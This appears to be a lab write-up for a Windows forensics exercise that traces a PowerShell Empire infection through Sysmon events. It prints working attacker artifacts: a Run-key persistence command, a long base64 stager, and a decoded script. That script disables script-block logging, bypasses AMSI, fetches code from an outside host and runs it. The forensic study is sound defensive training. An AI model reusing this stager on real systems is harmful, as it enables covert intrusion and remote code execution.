Investigating Windows 3.x

What is the registry key with the encoded payload? (full path)

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated

# First way
# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
# EventID 13 is registry value set
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

TimeCreated  : 1/21/2021 5:08:13 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
               EventType: SetValue
               UtcTime: 2021-01-22 01:08:13.468
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               Image: C:\Windows\Explorer.EXE
               TargetObject:
               HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
               Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp
               HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

# Second way
You can view /Desktop/sysmon.evtx by importing in event viewer.
Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

# View Registry in registry editor
HKCU:Software\Microsoft\Windows\CurrentVersion\Debug

What is the rule name for this run key generated by Sysmon?

Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

T1547.001

What tactics is classified with this MITRE ATT&CK ID?

# https://attack.mitre.org/techniques/T1547/
Persistence, Privilege Escalation

What was UTC time for the Sysmon event?

Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

2021-01-22 01:08:13.468

What was the Sysmon Event ID? Event Type? (answer, answer)

# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
13, SetValue

Decode the payload. What service will the payload attempt start?

% cat encode.txt | base64 -d > decode.txt
% cat decode.txt
sc.exe start Fax;
$FTPServer = "localhost";
$FTPPort = "9299";
$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort);
$tcpStream = $tcpConnection.GetStream();
$reader = New-Object System.IO.StreamReader($tcpStream);
$writer = New-Object System.IO.StreamWriter($tcpStream);
$writer.AutoFlush = $true;

Fax

The payload attempts to open a local port. What is the port number?

What process does the payload attempt to terminate?

kill (Get-Process FXSSVC).Id -force; Remove-Item -path  'C:\Windows\System32\ualapi.dll';IF($PSVErSIONTABlE.PSVErsIoN.MAJOr -GE 3){$fff6=[ref].ASsemBLy.GetTypE('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');If($ffF6){$B9BE=$fFf6.GETValUe($NULL);If($B9bE['ScriptB'+'lockLogging']){$B9Be['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$b9Be['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[COLlECtiOnS.GEnErIc.DIcTIoNARy[STrinG,SyStEM.OBjecT]]::nEw();$Val.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$b9bE['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ElSE{[SCRipTBlock]."GeTFie`ld"('signatures','N'+'onPublic,Static').SETVaLue($nULl,(New-OBjECt COLlectIoNs.GEnerIC.HaSHSeT[sTrIng]))}$Ref=[Ref].ASSEmbly.GeTType('System.Management.Automation.Amsi'+'Utils');$REf.GEtFIELD('amsiInitF'+'ailed','NonPublic,Static').SetVaLUE($nuLl,$TruE);};[SystEm.NET.SErVICEPoIntMAnAgeR]::ExPEcT100COnTInue=0;$27CE=NeW-OBJEct SYsTEm.NEt.WEBClIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExt.ENCoDiNg]::UNiCoDe.GETString([COnVeRt]::FrOMBAsE64STrINg('aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA==')));$t='/admin/get.php';$27CE.HeadErs.ADD('User-Agent',$u);$27Ce.PrOxY=[SySTEm.NET.WEBREqUesT]::DefAUltWEBPROXY;$27ce.PROXy.CrEDENTIals = [SyStem.NEt.CREdEnTiAlCAChE]::DEFAULTNeTwoRKCrEdenTiALS;$Script:Proxy = $27ce.Proxy;$K=[SystEm.TeXT.EnCoDiNg]::ASCII.GeTBYTes('awXUDkit<oV9JcROL{%gQ.|3nHqMpA/l');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$27CE.HeaDers.AdD("Cookie","RjMeek=ZmQLHacMBXrLcB+VElvLcwO26EY=");$DatA=$27Ce.DOwnloAdDAtA($Ser+$T);$iv=$DaTA[0..3];$DatA=$dAtA[4..$Data.lENgth];-jOIN[CHAr[]](& $R $dAtA ($IV+$K))|IEX

FXSSVC

What DLL file does the payload attempt to remove? (full path)

Remove-Item -path  'C:\Windows\System32\ualapi.dll'

ualapi.dll

What is the Windows Event ID associated with this service?

# Hint said me Printer
Application and Services Logs > Microsoft > Windows > PrinterService > Admin

823

What is listed as the New Default Printer?

The default printer was changed to PrintDemon. See the event user data for context information.

PrintDemon

What process is associated with this event?

# Find ualapi.dll in Procmon64

spoolsv.exe

What is the parent PID for the above process?

Examine the other processes. What is the PID of the process running the encoded payload?

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

TimeCreated  : 1/21/2021 5:05:45 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: technique_id=T1059.001,technique_name=PowerShell
               UtcTime: 2021-01-22 01:05:45.938
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
               Description: Windows PowerShell
               Product: Microsoft® Windows® Operating System
               Company: Microsoft Corporation
               OriginalFileName: PowerShell.EXE
               CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJAB
               QAFMAVgBFAHIAUwBJAE8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJAB
               mAGYAZgA2AD0AWwByAGUAZgBdAC4AQQBTAHMAZQBtAEIATAB5AC4ARwBlAHQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgB
               hAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAA
               nAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbAB
               pAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkAGYAZgBGADYAKQB7ACQAQgA5AEIARQA9ACQAZgBGAGYANgAuAEcARQBUAFYAYQB
               sAFUAZQAoACQATgBVAEwATAApADsASQBmACgAJABCADkAYgBFAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwB
               pAG4AZwAnAF0AKQB7ACQAQgA5AEIAZQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwB
               FAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABiADkAQgBlAFsAJwB
               TAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbAB
               vAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBBAGwAPQBbAEMATwBMAGwARQBDAHQAaQB
               PAG4AUwAuAEcARQBuAEUAcgBJAGMALgBEAEkAYwBUAEkAbwBOAEEAUgB5AFsAUwBUAHIAaQBuAEcALABTAHkAUwB0AEUATQAuAE8AQgB
               qAGUAYwBUAF0AXQA6ADoAbgBFAHcAKAApADsAJABWAGEAbAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwA
               nAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdAB
               CAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAOQBiAEUAWwAnAEgASwBFAFkAXwB
               MAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwB
               mAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwB
               nAGkAbgBnACcAXQA9ACQAVgBBAGwAfQBFAGwAUwBFAHsAWwBTAEMAUgBpAHAAVABCAGwAbwBjAGsAXQAuACIARwBlAFQARgBpAGUAYAB
               sAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA
               uAFMARQBUAFYAYQBMAHUAZQAoACQAbgBVAEwAbAAsACgATgBlAHcALQBPAEIAagBFAEMAdAAgAEMATwBMAGwAZQBjAHQASQBvAE4AcwA
               uAEcARQBuAGUAcgBJAEMALgBIAGEAUwBIAFMAZQBUAFsAcwBUAHIASQBuAGcAXQApACkAfQAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQB
               TAFMARQBtAGIAbAB5AC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwB
               tAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAGYALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQB
               zAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB
               0AFYAYQBMAFUARQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFMARQByAFYASQB
               DAEUAUABvAEkAbgB0AE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AFAARQBjAFQAMQAwADAAQwBPAG4AVABJAG4AdQBlAD0AMAA7ACQAMgA
               3AEMARQA9AE4AZQBXAC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQA
               nAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgB
               pAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKAB
               bAFQARQB4AHQALgBFAE4AQwBvAEQAaQBOAGcAXQA6ADoAVQBOAGkAQwBvAEQAZQAuAEcARQBUAFMAdAByAGkAbgBnACgAWwBDAE8AbgB
               WAGUAUgB0AF0AOgA6AEYAcgBPAE0AQgBBAHMARQA2ADQAUwBUAHIASQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA
               4AEEATAB3AEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE0AUQBBADIAQQB
               EAEUAQQBPAGcAQQA1AEEARABBAEEATQBBAEEAeABBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgB
               wAGgAcAAnADsAJAAyADcAQwBFAC4ASABlAGEAZABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA
               7ACQAMgA3AEMAZQAuAFAAcgBPAHgAWQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBxAFUAZQBzAFQAXQA6ADoARAB
               lAGYAQQBVAGwAdABXAEUAQgBQAFIATwBYAFkAOwAkADIANwBjAGUALgBQAFIATwBYAHkALgBDAHIARQBEAEUATgBUAEkAYQBsAHMAIAA
               9ACAAWwBTAHkAUwB0AGUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABpAEEAbABDAEEAQwBoAEUAXQA6ADoARABFAEYAQQBVAEwAVAB
               OAGUAVAB3AG8AUgBLAEMAcgBFAGQAZQBuAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAyADcAYwB
               lAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AEUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQB
               JAC4ARwBlAFQAQgBZAFQAZQBzACgAJwBhAHcAWABVAEQAawBpAHQAPABvAFYAOQBKAGMAUgBPAEwAewAlAGcAUQAuAHwAMwBuAEgAcQB
               NAHAAQQAvAGwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA
               1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwA
               kAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJAB
               JACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJAB
               IAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJAB
               IAF0AKQAlADIANQA2AF0AfQB9ADsAJAAyADcAQwBFAC4ASABlAGEARABlAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgB
               SAGoATQBlAGUAawA9AFoAbQBRAEwASABhAGMATQBCAFgAcgBMAGMAQgArAFYARQBsAHYATABjAHcATwAyADYARQBZAD0AIgApADsAJAB
               EAGEAdABBAD0AJAAyADcAQwBlAC4ARABPAHcAbgBsAG8AQQBkAEQAQQB0AEEAKAAkAFMAZQByACsAJABUACkAOwAkAGkAdgA9ACQARAB
               hAFQAQQBbADAALgAuADMAXQA7ACQARABhAHQAQQA9ACQAZABBAHQAQQBbADQALgAuACQARABhAHQAYQAuAGwARQBOAGcAdABoAF0AOwA
               tAGoATwBJAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
               CurrentDirectory: C:\Users\Administrator\
               User: WIN-Q5JJRDM876J\Administrator
               LogonGuid: {786593ca-776c-6009-5ea8-030000000000}
               LogonId: 0x3A85E
               TerminalSessionId: 1
               IntegrityLevel: High
               Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6
               E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
               ParentProcessGuid: {786593ca-24a3-600a-e400-000000000300}
               ParentProcessId: 3624
               ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Decode the payload. What is the a visible partial path?

;$t='/admin/get.php';

/admin/get.php

This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)

# https://github.com/EmpireProject/Empire
# https://www.powershellempire.com/?page_id=110

DefaultProfile, Empire

What other file paths are you likely to find in the logs? (answer, answer)

/news.php, /login/process.php

What is the MITRE ATT&CK URI for the attack framework?

# Google 'MITRE /news.php, /login/process.php attack'

https://attack.mitre.org/software/S0363/

What was the FQDN of the attacker machine that the suspicious process connected to?

% nslookup 34.245.128.161
161.128.245.34.in-addr.arpa    name = ec2-34-245-128-161.eu-west-1.compute.amazonaws.com.

Authoritative answers can be found from:

ec2-34-245-128-161.eu-west-1.compute.amazonaws.com

What other process connected to the attacker machine?

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=3' | Sort-Object TimeCreated | fl


TimeCreated  : 1/21/2021 5:05:50 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               RuleName: technique_id=T1059.001,technique_name=PowerShell
               UtcTime: 2021-01-21 19:52:53.946
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               User: WIN-Q5JJRDM876J\Administrator
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.10.146
               SourceHostname: -
               SourcePort: 49736
               SourcePortName: -
               DestinationIsIpv6: false
               DestinationIp: 34.245.128.161
               DestinationHostname: -
               DestinationPort: 9001
               DestinationPortName: -

TimeCreated  : 1/21/2021 5:07:10 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               RuleName: technique_id=T1043,technique_name=Commonly Used Port
               UtcTime: 2021-01-21 19:54:13.834
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               Image: C:\Windows\explorer.exe
               User: WIN-Q5JJRDM876J\Administrator
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.10.146
               SourceHostname: -
               SourcePort: 49737
               SourcePortName: -
               DestinationIsIpv6: false
               DestinationIp: 34.245.128.161
               DestinationHostname: -
               DestinationPort: 9001
               DestinationPortName: -

explorer.exe

What is the PID for this process?

What was the path for the first image loaded for the process identified in Q's 19 & 20?

# Filter with procmon
Operation = Load Image
PID = 2684

c:\Windows\System32\mscoree.dll

What Symon event were generated between these 2 processes? What is its associated Event ID #? (answer, answer)

# First under stand the question. It generate 2 process
# 2 process = 1(sysmonid1 process create), 2(sysmonid2 registry value create)
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

What is the UTC time for the first event between these 2 processes?

PS C:\Users\Administrator\Desktop> Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl


TimeCreated  : 1/21/2021 5:05:45 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: technique_id=T1059.001,technique_name=PowerShell
               UtcTime: 2021-01-22 01:05:45.938
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
               Description: Windows PowerShell
               Product: Microsoft® Windows® Operating System
               Company: Microsoft Corporation
               OriginalFileName: PowerShell.EXE
               CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAE8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIA
               cwBJAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABmAGYAZgA2AD0AWwByAGUAZgBdAC4AQQBTAHMAZQBtAEIATAB5AC4ARwBlAHQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhA
               GcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdA
               B0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkAGYAZgBGADYAKQB7ACQAQgA5AEIARQA9ACQAZgBGAGYANgAuAEcARQBUAFYAYQBsAFU
               AZQAoACQATgBVAEwATAApADsASQBmACgAJABCADkAYgBFAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAQgA5AEIAZQBbACcAUwBjAHIAaQBwAHQAQgAn
               ACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABiADkAQgBlAFsAJwBTAGMAc
               gBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD
               0AMAB9ACQAdgBBAGwAPQBbAEMATwBMAGwARQBDAHQAaQBPAG4AUwAuAEcARQBuAEUAcgBJAGMALgBEAEkAYwBUAEkAbwBOAEEAUgB5AFsAUwBUAHIAaQBuAEcALABTAHkAUwB0AEUATQAuAE8AQgBqAGUAYwB
               UAF0AXQA6ADoAbgBFAHcAKAApADsAJABWAGEAbAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEATAAuAEEA
               RABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAOQBiAEUAWwAnAEgASwBFAFkAXwBMAE8AQwBBA
               EwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYw
               ByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAVgBBAGwAfQBFAGwAUwBFAHsAWwBTAEMAUgBpAHAAVABCAGwAbwBjAGsAXQAuACIARwBlAFQARgBpAGUAYABsAGQAIgAoACc
               AcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUAZQAoACQAbgBVAEwAbAAsACgATgBlAHcALQBPAEIAagBF
               AEMAdAAgAEMATwBMAGwAZQBjAHQASQBvAE4AcwAuAEcARQBuAGUAcgBJAEMALgBIAGEAUwBIAFMAZQBUAFsAcwBUAHIASQBuAGcAXQApACkAfQAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQBTAFMARQBtAGIAb
               AB5AC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAG
               YALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAFUARQA
               oACQAbgB1AEwAbAAsACQAVAByAHUARQApADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFMARQByAFYASQBDAEUAUABvAEkAbgB0AE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AFAARQBjAFQAMQAwADAA
               QwBPAG4AVABJAG4AdQBlAD0AMAA7ACQAMgA3AEMARQA9AE4AZQBXAC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsA
               GEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQ
               BjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AHQALgBFAE4AQwBvAEQAaQBOAGcAXQA6ADoAVQBOAGkAQwBvAEQAZQAuAEcARQBUAFMAdAByAGkAbgBnACgAWwBDAE8AbgBWAGUAUgB0AF0AOgA6AEY
               AcgBPAE0AQgBBAHMARQA2ADQAUwBUAHIASQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABFAEEATQBn
               AEEANABBAEMANABBAE0AUQBBADIAQQBEAEUAQQBPAGcAQQA1AEEARABBAEEATQBBAEEAeABBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAAyADcAQ
               wBFAC4ASABlAGEAZABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMgA3AEMAZQAuAFAAcgBPAHgAWQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAVAAuAFcARQBCAF
               IARQBxAFUAZQBzAFQAXQA6ADoARABlAGYAQQBVAGwAdABXAEUAQgBQAFIATwBYAFkAOwAkADIANwBjAGUALgBQAFIATwBYAHkALgBDAHIARQBEAEUATgBUAEkAYQBsAHMAIAA9ACAAWwBTAHkAUwB0AGUAbQA
               uAE4ARQB0AC4AQwBSAEUAZABFAG4AVABpAEEAbABDAEEAQwBoAEUAXQA6ADoARABFAEYAQQBVAEwAVABOAGUAVAB3AG8AUgBLAEMAcgBFAGQAZQBuAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIA
               bwB4AHkAIAA9ACAAJAAyADcAYwBlAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AEUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAFQAZQBzA
